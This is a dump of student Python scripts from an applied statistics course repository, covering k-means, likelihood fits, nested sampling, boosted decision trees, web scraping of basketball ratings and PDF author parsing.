\n If index is not given it assumes\n a single line of data.\n '''\n if index is not None:\n plt.imshow(data[index, 2::].reshape((28, 28)))\n else:\n plt.imshow(data[2::].reshape((28, 28)))\n\n\ndef init_centroids(data, n):\n \"\"\"\n Returns random initial centroids from data.\n \"\"\"\n index = np.random.randint(len(data), size=(n))\n init_cent = data[index, :]\n return init_cent\n\n\ndef dist_centroids(data, cent):\n '''\n Returns the distance between each point (each row in data) and centroids\n '''\n dist = []\n for i in range(cent.shape[0]):\n temp = np.linalg.norm(data[:, 2::] - cent[i, 2::], axis=1)\n dist = np.append(dist, temp)\n dist = dist.reshape((cent.shape[0], data.shape[0])).T\n return dist\n\n\ndef label_centroids(data, dist):\n '''\n Adds Label to data according to its closest centroid\n '''\n new_data = np.copy(data)\n temp = np.argmin(dist, axis=1) + 1\n new_data[:, 0] = temp\n return new_data\n\n\ndef new_centroids(data, cent):\n '''\n Calculates the new centroids from data with same label\n '''\n new_cent = np.copy(cent)\n for i in range(new_cent.shape[0]):\n new = np.average(data[data[:, 0] == i + 1][:, 2::], axis=0)\n new_cent[i, 2::] = new\n\n return new_cent\n\n\ndef label_clusters(data, cent, n):\n '''\n Finds most common label in cluster and sets cluster label\n '''\n for i in range(n):\n temp = data[data[:, 0] == i + 1]\n if len(temp) == 0:\n continue\n\n temp1 = temp[:, 1].astype(int)\n label = np.bincount(temp1).argmax()\n cent[i, 0] = label\n return cent\n\n\ndef classify(to_be_classified, cent):\n\n dist = []\n classified = np.copy(to_be_classified)\n print(cent)\n for i in range(cent.shape[0]):\n temp = np.linalg.norm(to_be_classified[:, 2::] - cent[i, 2::], axis=1)\n dist = np.append(dist, temp)\n dist = dist.reshape((cent.shape[0], to_be_classified.shape[0])).T\n temp = np.argmin(dist, axis=1)\n\n classified[:, 0] = cent[temp, 0]\n\n return classified\n\n\ndef get_accuracy(x, y):\n\n correct_classified = 0\n for i in range(len(x)):\n if x[i] == y[i]:\n correct_classified += 1\n accuracy = correct_classified / len(x)\n\n return accuracy\n\n\ndef K_means(data, n):\n '''\n Does k-means analysis\n '''\n previous_difference = 0\n centroids = init_centroids(data, n)\n\n for _ in range(20):\n print(1)\n distance_from_centroids = dist_centroids(data, centroids)\n data = label_centroids(data, distance_from_centroids)\n centroids_new = new_centroids(data, centroids)\n\n difference = centroids[:, 2::] - centroids_new[:, 2::]\n norm_difference = np.linalg.norm(difference, axis=1)\n largest_norm_difference = max(norm_difference)\n difference_change = abs((largest_norm_difference - previous_difference) /\n np.mean([largest_norm_difference, previous_difference])) * 100\n previous_difference = largest_norm_difference\n\n centroids = np.copy(centroids_new)\n print(difference_change)\n \n\n\n\n centroids = label_clusters(data, centroids, n)\n\n return data, centroids\n\n\n# Read file\n\nnp.random.seed(2)\nX_train, y_train_labels = loadlocal_mnist(\n images_path='digit-recognizer/train-images-idx3-ubyte',\n labels_path='digit-recognizer/train-labels-idx1-ubyte')\n\nX_test, y_test_labels = loadlocal_mnist(\n images_path='digit-recognizer/t10k-images-idx3-ubyte',\n labels_path='digit-recognizer/t10k-labels-idx1-ubyte')\n\ntrain = np.insert(X_train, 0, y_train_labels, axis=1)\ntrain = np.insert(train, 0, np.zeros(train.shape[0]), axis=1)\ntrain = train[:4000, :]\n\ntest = np.insert(X_test, 0, y_test_labels, axis=1)\ntest = np.insert(test, 0, np.zeros(test.shape[0]), axis=1)\ntest 
= test[:100, :]\n\n\ntrain, cent = K_means(train, 10)\n\n\nstart = time.time()\nprint(test)\nclassified = classify(test, cent)\nprint(classified)\nend = time.time()\n\n\naccuracy = get_accuracy(classified[:, 0], classified[:, 1])\nprint('Your accuracy is: ', accuracy)\nprint('Your error rate is: ', 1 - accuracy)\nprint('Time to classify: ', end - start)\n\ndisplay_digit(classified, 1)\nplt.show()\n" }, { "alpha_fraction": 0.5843035578727722, "alphanum_fraction": 0.6192324161529541, "avg_line_length": 28.730770111083984, "blob_id": "60cd26ebc191d717885ce1c12b2ff34e2db71e99", "content_id": "62e35e7032363e62dc3072d4e90d5bcc148c542f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2319, "license_type": "no_license", "max_line_length": 79, "num_lines": 78, "path": "/Week_3/Class_5/exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\n\ndef my_func(x, alpha, beta):\n result = 1 + alpha * x + beta * x ** 2\n return result\n\n\ndef norm_factor(beta):\n # Calculated using wolfram maybe create function to do this?\n result = 0.571583 * beta + 1.9\n return result\n\n\nalpha = 0.5\nbeta = 0.5\n\nmy_alphas = np.empty((1, 0))\nmy_betas = np.empty((1, 0))\n\nrandom.seed(142)\nn = 50\nfor _ in range(n):\n # Create my empty arrays\n x = np.empty((1, 0))\n N = 2000\n\n # Fill my arrays with random numbers\n for i in range(N):\n x_random = random.uniform(-0.95, 0.95)\n y_random = random.random()\n if y_random < my_func(x_random, alpha, beta) / norm_factor(beta):\n x = np.append(x, x_random)\n\n binwidth = 0.01\n alpha_scan = np.arange(0.1, 1 + binwidth, binwidth)\n beta_scan = np.arange(0.1, 1 + binwidth, binwidth)\n\n LLH = np.zeros((len(alpha_scan), len(beta_scan)))\n\n for i, scan_alpha in enumerate(alpha_scan, 0):\n for j, scan_beta in enumerate(beta_scan, 0):\n\n LLH[i, j] = np.sum(np.log(my_func(x, scan_alpha, scan_beta) /\n norm_factor(scan_beta)))\n\n ind = np.unravel_index(np.argmax(LLH, axis=None), LLH.shape)\n my_alphas = np.append(my_alphas, alpha_scan[ind[0]])\n my_betas = np.append(my_betas, alpha_scan[ind[1]])\n# print(my_alphas, my_betas)\n\n# Plot the numbers\nplt.plot(my_alphas, my_betas, marker='o', linestyle='None')\nplt.xlim(0, 1)\nplt.ylim(0, 1)\n\nbinwidth = 0.05\nn_bins = np.arange(min(my_alphas), max(my_alphas) + binwidth, binwidth)\nplt.figure(2)\nplt.axvline(x=np.mean(my_alphas)-np.std(my_alphas), ls = \"--\", color='#2ca02c')\nplt.axvline(x=np.mean(my_alphas)+np.std(my_alphas), ls = \"--\", color='#2ca02c')\nplt.hist(my_alphas, bins=n_bins)\n\nbinwidth = 0.05\nn_bins = np.arange(min(my_betas), max(my_betas) + binwidth, binwidth)\nplt.figure(3)\nplt.hist(my_betas, bins=n_bins)\nplt.axvline(x=np.mean(my_alphas)-np.std(my_alphas), ls = \"--\", color='#2ca02c')\nplt.axvline(x=np.mean(my_alphas)+np.std(my_alphas), ls = \"--\", color='#2ca02c')\n\nprint('Mean of alpha is: %8.2f' % (np.mean(my_alphas)))\nprint('STD of alpha is: %8.2f' % (np.std(my_alphas)))\nprint('Mean of beta is: %8.2f' % (np.mean(my_betas)))\nprint('STD of beta is: %8.2f' % (np.std(my_betas)))\n\nplt.show()\n" }, { "alpha_fraction": 0.5691592693328857, "alphanum_fraction": 0.6334754228591919, "avg_line_length": 25.597938537597656, "blob_id": "4d4115518b3b85b9f41263d53702f01a16b99f21", "content_id": "c7f9171f72b2960c17d301d0c14091ae0b6fb21f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 2581, "license_type": "no_license", "max_line_length": 91, "num_lines": 97, "path": "/Exam_2019/Code/prob5.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport nestle\nimport scipy \n\nplt.style.use('bmh')\n\n\ndef Likelihood(theta):\n mu = 0.68\n sigma = 0.2\n temp1 = np.cos(theta[0]) * np.cos(theta[1])\n temp2 = 1 / (sigma * np.sqrt(2 * np.pi))\n temp3 = np.exp(- (theta[2] - mu) ** 2 / (2 * sigma ** 2))\n temp4 = np.cos(theta[0] / 2)\n\n my_function = 3 * (temp1 + temp2 * temp3 * temp4 + 3)\n\n return my_function\n\n\n# Define a function mapping the unit cube to the prior space.\n# This function defines a flat prior in [-5., 5.) in both dimensions.\ndef prior_transform(x):\n return 7 * np.pi * x # - 5.0\n\n\nx = np.arange(0, 7 * np.pi, 0.1)[np.newaxis]\ny = np.arange(0, 7 * np.pi, 0.1)\nz = np.arange(0, 3, 0.1)\n\n\n# plt.figure(1)\n# plt.imshow(Likelihood([x.T, y]), cmap='hot')\n# plt.show()\n\n# Run nested sampling.\nresult = nestle.sample(Likelihood, prior_transform, 3, npoints=1000, method='multi')\n\n\nresult.logz # log evidence\nresult.logzerr # numerical (sampling) error on logz\nresult.samples # array of sample parameters\nresult.weights # array of weights associated with each sample\n\nplt.figure(2)\nplt.plot(result.samples[400:, 0], result.samples[400:, 2], '.')\nplt.xlabel('$\\\\theta_{1}$')\nplt.ylabel('$\\\\theta_{3}$')\nplt.ylim(0, 3) \n# # plt.hist2d(result.samples[:, 0], result.samples[:, 1], weights=result.weights, bins=20)\nplt.show()\n\nprint('Best theta1', result.samples[-1, 0])\nprint('Best theta2', result.samples[-1, 1])\nprint('Best theta3', result.samples[-1, 2])\n\nbinwidth = 0.1\nmu_scan = np.arange(0.05, 7 * np.pi + binwidth, binwidth)\nsigma_scan = np.arange(0.05, 7 * np.pi + binwidth, binwidth)\n\n\nLLH = np.zeros((len(mu_scan), len(sigma_scan)))\n\nbest1 = 12.349165650011875\nbest2 = 6.781712075143268\nbest3 = 0.7898809313896807\n\nfor i, mu in enumerate(mu_scan, 0):\n for j, sigma in enumerate(sigma_scan, 0):\n theta = [mu, sigma, best3]\n LLH[i, j] = np.sum(np.log(Likelihood(theta)))\n\n\nplt.imshow(LLH, cmap='hot', origin='lower', extent=(0, 7 * np.pi, 0, 7 * np.pi))\nplt.xlabel('$\\\\theta_{1}$')\nplt.ylabel('$\\\\theta_{2}$')\nplt.show()\n\nbinwidth = 0.1\nmu_scan = np.arange(0.05, 7 * np.pi + binwidth, binwidth)\nsigma_scan = np.arange(0.05, 3 + binwidth, binwidth)\n\n\nLLH = np.zeros((len(mu_scan), len(sigma_scan)))\n\n\nfor i, mu in enumerate(mu_scan, 0):\n for j, sigma in enumerate(sigma_scan, 0):\n theta = [mu, best2, sigma_scan]\n LLH[i, j] = np.sum(np.log(Likelihood(theta)))\n\n\nplt.imshow(LLH.T, cmap='hot', origin='lower', extent=(0, 7 * np.pi, 0, 3))\nplt.xlabel('$\\\\theta_{1}$')\nplt.ylabel('$\\\\theta_{3}$')\nplt.show()\n\n" }, { "alpha_fraction": 0.5619967579841614, "alphanum_fraction": 0.6070853471755981, "avg_line_length": 16.27777862548828, "blob_id": "336b1f09c8690849ddffd6cd175c7d422619bed1", "content_id": "16a6fb094559c82f4c400c17ccda618275b1d6d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 621, "license_type": "no_license", "max_line_length": 66, "num_lines": 36, "path": "/Week_3/Class_6/markov_chain_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\nstart = 100\nmu = 0.5 * start\nsigma = 1\n\nn = 100\n\n\n\nnew_x = 
np.array([])\n\n\nfor i in np.arange(n):\n temp = np.random.normal(mu, sigma, 1)\n mu = 0.5 * temp\n new_x = np.append(new_x, temp)\n\n\nnew_x_1 = np.array([])\nstart = -27\nmu = 0.5 * start\nsigma = 1\n\nfor i in np.arange(n):\n temp = np.random.normal(mu, sigma, 1)\n mu = 0.5 * temp\n new_x_1 = np.append(new_x_1, temp)\n\nplt.plot(np.arange(n), new_x, 'ko', markersize=1, label='prior')\nplt.plot(np.arange(n), new_x_1, 'ro', markersize=1, label='prior')\nplt.show()\n\nprint(np.mean(new_x[10::]))" }, { "alpha_fraction": 0.5995599627494812, "alphanum_fraction": 0.6362302899360657, "avg_line_length": 34.415584564208984, "blob_id": "db4424149ce028b7e74b0a65f4fc61ab14855a60", "content_id": "d03bb216e272cb7f1b2be4253971378b40b769e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2727, "license_type": "no_license", "max_line_length": 105, "num_lines": 77, "path": "/Problem_set_1/problem_set_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nplt.style.use('bmh')\n\nmy_url = 'https://kenpom.com/index.php?y=2014'\nmy_page = requests.get(my_url)\n\nsoup = BeautifulSoup(my_page.text, 'html.parser')\n\nratings_table = soup.find(id='ratings-table')\n\nheaders = ratings_table.find(class_='thead2')\n\ntitles = headers.find_all('th')\n\nheader_titles = []\n\nfor title in titles:\n try:\n header_titles.append(title.contents[0].contents[0])\n except:\n header_titles.append(title.contents[0])\n\nprint(header_titles)\n\nbody = ratings_table.find_all('tbody')\nrows = body[0].find_all('tr')\n\nconferences = ['ACC', 'SEC', 'B10', 'BSky', 'A10']\nACC_AdjD = np.array([])\nSEC_AdjD = np.array([])\nB10_AdjD = np.array([])\nBSky_AdjD = np.array([])\nA10_AdjD = np.array([])\n\nfor row in rows:\n temp = row.find_all('td')\n if len(temp) == 0:\n pass\n else:\n if temp[2].contents[0].contents[0] in conferences:\n if str(temp[2].contents[0].contents[0]) == 'ACC':\n ACC_AdjD = np.append(ACC_AdjD, float(temp[7].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'SEC':\n SEC_AdjD = np.append(SEC_AdjD, float(temp[7].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'B10':\n B10_AdjD = np.append(B10_AdjD, float(temp[7].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'BSky':\n BSky_AdjD = np.append(BSky_AdjD, float(temp[7].contents[0]))\n elif str(temp[2].contents[0].contents[0]) == 'A10':\n A10_AdjD = np.append(A10_AdjD, float(temp[7].contents[0]))\n else:\n pass\n\n\nbinwidth = 0.5\nn_bins_1 = np.arange(min(ACC_AdjD), max(ACC_AdjD) + binwidth, binwidth)\nn_bins_2 = np.arange(min(SEC_AdjD), max(SEC_AdjD) + binwidth, binwidth)\nn_bins_3 = np.arange(min(B10_AdjD), max(B10_AdjD) + binwidth, binwidth)\nn_bins_4 = np.arange(min(BSky_AdjD), max(BSky_AdjD) + binwidth, binwidth)\nn_bins_5 = np.arange(min(A10_AdjD), max(A10_AdjD) + binwidth, binwidth)\nprint(n_bins_4)\n\nplt.hist(ACC_AdjD, bins=n_bins_1, alpha=0.9, color='blue', edgecolor='black', linewidth=1, label='ACC')\nplt.hist(SEC_AdjD, bins=n_bins_2, color='maroon', edgecolor='black', linewidth=1, label='SEC')\nplt.hist(B10_AdjD, bins=n_bins_3, alpha=0.9, color='yellow', edgecolor='black', linewidth=1, label='B10')\nplt.hist(BSky_AdjD, bins=n_bins_4, color='green', edgecolor='black', linewidth=1, label='BSky')\nplt.hist(A10_AdjD, bins=n_bins_5, alpha=0.7, color='grey', edgecolor='black', linewidth=1, label='A10')\nplt.title(\"The 
Adjusted Defense for 5 conferences\")\nplt.legend()\nplt.ylabel('Number of counts in bin')\nplt.xlabel('AdjD')\n\nplt.show()\n" }, { "alpha_fraction": 0.6582914590835571, "alphanum_fraction": 0.6934673190116882, "avg_line_length": 26.63888931274414, "blob_id": "d4fe6c8063988bbe6e1dc09289ae8030ddc5a230", "content_id": "e1b7e3e53cfa9bb3617ba64c603b7d0fd91cfba2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 995, "license_type": "no_license", "max_line_length": 87, "num_lines": 36, "path": "/Week_7/Class_13/multinest.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport nestle\n\n\ndef Likelihood(theta):\n my_function = np.sin(theta[0]) * np.sin(theta[1])\n return my_function\n\n\n# Define a function mapping the unit cube to the prior space.\n# This function defines a flat prior in [-5., 5.) in both dimensions.\ndef prior_transform(x):\n return 5 * np.pi * x # - 5.0\n\n\nx = np.arange(0, 5 * np.pi, 0.1)[np.newaxis]\ny = np.arange(0, 5 * np.pi, 0.1)\n\nplt.figure(1)\nplt.imshow(Likelihood([x.T, y]), cmap='hot')\n# plt.show()\n\n# Run nested sampling.\nresult = nestle.sample(Likelihood, prior_transform, 2, npoints=1000, method='multi')\n\n\nresult.logz # log evidence\nresult.logzerr # numerical (sampling) error on logz\nresult.samples # array of sample parameters\nresult.weights # array of weights associated with each sample\n\nplt.figure(2)\n# plt.plot(result.samples[400:, 0], result.samples[400:, 1], '.')\nplt.hist2d(result.samples[:, 0], result.samples[:, 1], weights=result.weights, bins=20)\nplt.show()\n" }, { "alpha_fraction": 0.581250011920929, "alphanum_fraction": 0.634765625, "avg_line_length": 17.03521156311035, "blob_id": "6eaca2d678db7a284125642ad968841fee32587e", "content_id": "ee1ec5830d8e34ddd0086dc2deaccbd552adae6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2560, "license_type": "no_license", "max_line_length": 58, "num_lines": 142, "path": "/Problem_set_1/problem_set_bonus.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import PyPDF2\n\npdfFileObj = open('authors-acknowledgements-v5.pdf', 'rb')\npdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n\nprint(pdfReader.numPages)\n\npageObj = pdfReader.getPage(0)\n\ntext = pageObj.extractText()\n\nto_loop = text.split()\n\ntemp_authors = []\nfor i in to_loop:\n if not i.isdigit():\n temp_authors.append(i)\n\ndel temp_authors[0:14]\n\n\nauthors = []\ntemp = ''\nfor i in temp_authors:\n if ',' in i:\n authors.append(temp)\n temp = ''\n else:\n temp = temp + i\n \n### new page\n\npageObj = pdfReader.getPage(1)\ntext = pageObj.extractText()\nto_loop = text.split()\n\ntemp_authors = []\nfor i in to_loop:\n if not i.isdigit():\n temp_authors.append(i)\n\ntemp = ''\nfor i in temp_authors:\n if ',' in i:\n authors.append(temp)\n temp = ''\n else:\n temp = temp + i\n\n### new page \n\npageObj = pdfReader.getPage(2)\ntext = pageObj.extractText()\nto_loop = text.split()\n\ntemp_authors = []\nfor i in to_loop:\n if not i.isdigit():\n temp_authors.append(i)\n\n\n\ndel temp_authors[0:2]\ndel temp_authors[877:886]\ndel temp_authors[960:963]\ndel temp_authors[1031]\ndel temp_authors[874]\ndel temp_authors[954]\ndel temp_authors[1026]\n\ntemp = ''\nfor i in temp_authors:\n if ',' in i:\n authors.append(temp)\n temp = ''\n else:\n temp = temp + i\n\n### new page \n\npageObj 
= pdfReader.getPage(3)\ntext = pageObj.extractText()\nto_loop = text.split()\n\ntemp_authors = []\nfor i in to_loop:\n if not i.isdigit():\n temp_authors.append(i)\n\ndel temp_authors[776:783]\ndel temp_authors[801:814]\ndel temp_authors[773]\ndel temp_authors[777]\ndel temp_authors[796]\ndel temp_authors[833:836]\ndel temp_authors[1178:1187]\ndel temp_authors[830]\ndel temp_authors[1174]\n# print(temp_authors.index('AND'))\n# print(temp_authors[1178:1187])\n\ntemp = ''\nfor i in temp_authors:\n if ',' in i:\n authors.append(temp)\n temp = ''\n else:\n temp = temp + i\n\n### new page\n\npageObj = pdfReader.getPage(4)\ntext = pageObj.extractText()\nto_loop = text.split()\n\ntemp_authors = []\nfor i in to_loop:\n if not i.isdigit():\n temp_authors.append(i)\n\ndel temp_authors[0:2]\ndel temp_authors[410:413]\ndel temp_authors[506:513]\ndel temp_authors[642:645]\ndel temp_authors[703:708]\ndel temp_authors[404]\ndel temp_authors[501]\ndel temp_authors[637]\ndel temp_authors[695]\ndel temp_authors[1171]\n# print(temp_authors.index('AND'))\n# print(temp_authors[703:708])\n\ntemp = ''\nfor i in temp_authors:\n if ',' in i:\n authors.append(temp)\n temp = ''\n else:\n temp = temp + i\n\nprint(authors)" }, { "alpha_fraction": 0.5752381086349487, "alphanum_fraction": 0.6133333444595337, "avg_line_length": 34.47297286987305, "blob_id": "f49c5fe62b4f82f2edaaaeabf99f9d0d9548cd5d", "content_id": "1a60b6ddf3f019f196cd6c877f19fd39553ed9bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2625, "license_type": "no_license", "max_line_length": 107, "num_lines": 74, "path": "/Exam_2019/Code/Problem_4.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport xgboost as xgb\nfrom sklearn.metrics import accuracy_score\nimport matplotlib.pyplot as plt\n\nplt.style.use('bmh')\n\n\ndef convert_to_Dmatrix(X, y, features_names):\n dmatrix = xgb.DMatrix(data=X, label=y, feature_names=features_names)\n return dmatrix, X, y\n\n\nfnames = ['Exam_2019_Prob4_TrainData.csv',\n 'Exam_2019_Prob4_TestData.csv',\n 'Exam_2019_Prob4_BlindData.csv']\n\ndata_dict = {}\nfeatures_names = []\nID_blind = []\n\nfor file in fnames:\n temp = pd.read_csv(file)\n if file == 'Exam_2019_Prob4_TrainData.csv':\n features_names = list(temp.iloc[:, 1:-1])\n elif file == 'Exam_2019_Prob4_BlindData.csv':\n ID_blind = temp.iloc[:, 0]\n data_dict[file[:-4]] = temp.iloc[:, 1:].values\n\n\ndmatrix_train, X_train, y_train = convert_to_Dmatrix(data_dict['Exam_2019_Prob4_TrainData'][:, :-1],\n data_dict['Exam_2019_Prob4_TrainData'][:, -1],\n features_names)\n\ndmatrix_test, X_test, y_test = convert_to_Dmatrix(data_dict['Exam_2019_Prob4_TestData'][:, :-1],\n data_dict['Exam_2019_Prob4_TestData'][:, -1],\n features_names)\n\n\nX_blind = data_dict['Exam_2019_Prob4_BlindData']\ndmatrix_blind = xgb.DMatrix(data=X_blind, \n feature_names=features_names)\n\n\nparam = {'max_depth': 2, 'eta': 1, 'silent': 1, 'objective': 'binary:logistic'}\nmodel = xgb.train(param, dmatrix_train, num_boost_round=12)\n\ny_pred = model.predict(dmatrix_test)\npredictions = [round(value) for value in y_pred]\n\naccuracy = accuracy_score(dmatrix_test.get_label(), predictions)\nprint(\"Accuracy: %.2f%%\" % (accuracy * 100.0))\n\nbinwidth = 0.03\nn_bins = np.arange(min(y_pred[y_test==0]), max(y_pred[y_test==0]) + binwidth, binwidth)\nplt.hist(y_pred[y_test==0], bins=n_bins, color='r', histtype='step', label='No-show==0', 
lw=2)\nplt.hist(y_pred[y_test==1], bins=n_bins, color='k', histtype='step', label='No-show==1', lw=2)\nplt.xlabel('Decision score')\nplt.ylabel('Counts')\nplt.legend()\n\n\nxgb.plot_importance(model)\nplt.rcParams['figure.figsize'] = [5, 5]\nplt.show()\n\ny_pred = model.predict(dmatrix_blind)\npredictions = [round(value) for value in y_pred]\n\n\nID_blind = np.append(ID_blind.values[:, None], np.array(predictions)[:, None], axis=1)\nnp.savetxt('ramyar.AMAS_Exam_2019.Problem4.NoShowFalse.txt', ID_blind[ID_blind[:, 1] == 0][:, 0], fmt='%i')\nnp.savetxt('ramyar.AMAS_Exam_2019.Problem4.NoShowTrue.txt', ID_blind[ID_blind[:, 1] == 1][:, 0], fmt='%i')\n" }, { "alpha_fraction": 0.5640096664428711, "alphanum_fraction": 0.5821256041526794, "avg_line_length": 23.352941513061523, "blob_id": "d0c5a51e284297a714fb71054797a39cae4c2716", "content_id": "c0e23c77923a8a7e36396064a10b89a38502e2f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 828, "license_type": "no_license", "max_line_length": 81, "num_lines": 34, "path": "/Week_1/Class_1/Exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\n\nfile_name = 'FranksNumbers.txt'\n\nmy_file = open(file_name, 'r')\n\nmy_array = np.zeros((1,2))\nprint(my_array)\n\ncounter = -1\nrow_counter = 0\n\nfor line in my_file:\n\n current_line = line.split()\n if len(current_line) > 3:\n pass\n elif len(current_line) == 3:\n counter += 1\n my_array = np.expand_dims(my_array, axis = -1)\n print(my_array.shape)\n elif len(current_line) == 0:\n print('Empty Line!')\n else:\n temp_array = np.array([float(current_line[0]), float(current_line[1])])\n temp_array = np.expand_dims(temp_array, axis = 0)\n print(temp_array)\n print(my_array[:,:,0].shape)\n print(counter)\n my_array[:, :, counter] = np.stack((my_array[:, :, counter], temp_array))\n\n\nmy_array = np.delete(my_array, 0, 0)\nprint(my_array)\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5524271726608276, "avg_line_length": 16.457626342773438, "blob_id": "34164ace63c4d7fc9f622ae0de4c4d16adc93e65", "content_id": "3bb6f635018bbe0539cda5e1a00d5faa1ecc7a3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1030, "license_type": "no_license", "max_line_length": 57, "num_lines": 59, "path": "/Week_1/Class_2/least_squares.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as plt\n\nx = np.array([0.0, 1.0, 2.0, 3.0, 4.0, 5.0])\ny = np.array([0.0, 0.8, 0.9, 0.1, -0.8, -1.0])\n\n\ndef poly1(x, a):\n\n return a * x\n\n\ndef poly2(x, a, b):\n\n return a * x + b * x ** 2\n\n\ndef poly3(x, a, b, c):\n\n return a * x + b * x ** 2 + c * x ** 3\n\n\ndef poly4(x, a, b, c, d):\n\n return a * x + b * x ** 2 + c * x ** 3 + d * x ** 4\n\n\na, b, c = curve_fit(poly3, x, y)[0]\n\n# plt.plot(x, y, marker='o', linestyle='None')\n# plt.plot(x, poly3(x, a, b, c))\n\n# plt.show()\n\n\ndef my_chisquare(observed, expected, sigma):\n chi = np.sum((observed - expected) ** 2 / sigma ** 2)\n\n return chi\n\n\nmu, sigma = 0, 0.1\ns = np.random.normal(mu, sigma, 100)\nlnspc = np.linspace(min(s), max(s), len(s))\n\na, b, c = curve_fit(poly3, s, lnspc)[0]\n\nbinwidth = 0.05\nn_bins = np.arange(min(s), max(s) + binwidth, binwidth)\nplt.hist(s, bins=n_bins, density='True')\n\nplt.plot(s, poly3(s, a, b, 
c))\n\nplt.show()\n\n\n\nprint(my_chisquare(y, poly3(x, a, b, c), 0.5))\n" }, { "alpha_fraction": 0.5832298398017883, "alphanum_fraction": 0.6111801266670227, "avg_line_length": 29.37735939025879, "blob_id": "0201f3aa522d38a91e8b067faae2595dbfe9d5de", "content_id": "6d721a4196c4031f6fbf9a49811d467bf9177f73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3220, "license_type": "no_license", "max_line_length": 87, "num_lines": 106, "path": "/Week_6/Class_12/bdt_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport xgboost as xgb\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score\n\nplt.style.use('bmh')\ndef convert_to_Dmatrix(data_set_1, data_set_2):\n\n labels_1 = np.zeros((data_set_1.shape[0], 1))\n labels_2 = np.ones((data_set_2.shape[0], 1))\n\n X = np.vstack((data_set_1, data_set_2))\n y = np.vstack((labels_1, labels_2))\n\n dmatrix = xgb.DMatrix(data=X, label=y, feature_names=['x', 'y', 'z'])\n\n return dmatrix, X, y\n\n\n\nfnames = ['BDT_background_train.txt', 'BDT_signal_train.txt',\n 'BDT_background_test.txt', 'BDT_signal_test.txt']\n\ndata_dict = {}\n\nfor file in fnames:\n data_dict[file[:-4]] = np.loadtxt(file)\n\ndmatrix_train, X_train, y_train = convert_to_Dmatrix(data_dict['BDT_background_train'],\n data_dict['BDT_signal_train'])\ndmatrix_test, X_test, y_test = convert_to_Dmatrix(data_dict['BDT_background_test'],\n data_dict['BDT_signal_test'])\n\nparam = {'max_depth': 3, 'eta': 1, 'silent': 1, 'objective': 'binary:logistic'}\nmodel = xgb.train(param, dmatrix_train)\n\ny_pred = model.predict(dmatrix_test)\npredictions = [round(value) for value in y_pred]\n\naccuracy = accuracy_score(dmatrix_test.get_label(), predictions)\nprint(\"Accuracy: %.2f%%\" % (accuracy * 100.0))\n\n\n# plt.style.use('bmh')\n\n# plt.figure(figsize=(15, 8))\n# plt.subplot(131)\n# plt.hist(data_bg[:, 0], label='Background X', alpha=0.9)\n# plt.hist(data_signal[:, 0], label='Signal X', alpha=0.7)\n# plt.legend()\n\n# plt.subplot(132)\n# plt.hist(data_bg[:, 1], label='Background Y', alpha=0.9)\n# plt.hist(data_signal[:, 1], label='Signal Y', alpha=0.7)\n# plt.legend()\n\n# plt.subplot(133)\n# plt.hist(data_bg[:, 2], label='Background Z', alpha=0.9)\n# plt.hist(data_signal[:, 2], label='Signal Z', alpha=0.7)\n# plt.legend()\n\n# plt.figure(figsize=(15, 5))\n# plt.subplot(131)\n# plt.plot(data_bg[:, 0], data_bg[:, 1], '.', label='X vs Y BG')\n# plt.plot(data_signal[:, 0], data_signal[:, 1], '.', label='X vs Y Signal')\n# plt.legend()\n\n# plt.subplot(132)\n# plt.plot(data_bg[:, 0], data_bg[:, 2], '.', label='X vs Z BG')\n# plt.plot(data_signal[:, 0], data_signal[:, 2], '.', label='X vs Z Signal')\n# plt.legend()\n\n# plt.subplot(133)\n# plt.plot(data_bg[:, 1], data_bg[:, 2], '.', label='Y vs Z BG')\n# plt.plot(data_signal[:, 1], data_signal[:, 2], '.', label='Y vs Z Signal')\n# plt.legend()\n# plt.show()\n\n\nbackground = np.array([])\nsignal = np.array([])\n\nfor i, prediction in enumerate(predictions):\n if prediction == 0:\n background = np.append(background, X_test[i])\n else:\n signal = np.append(signal, 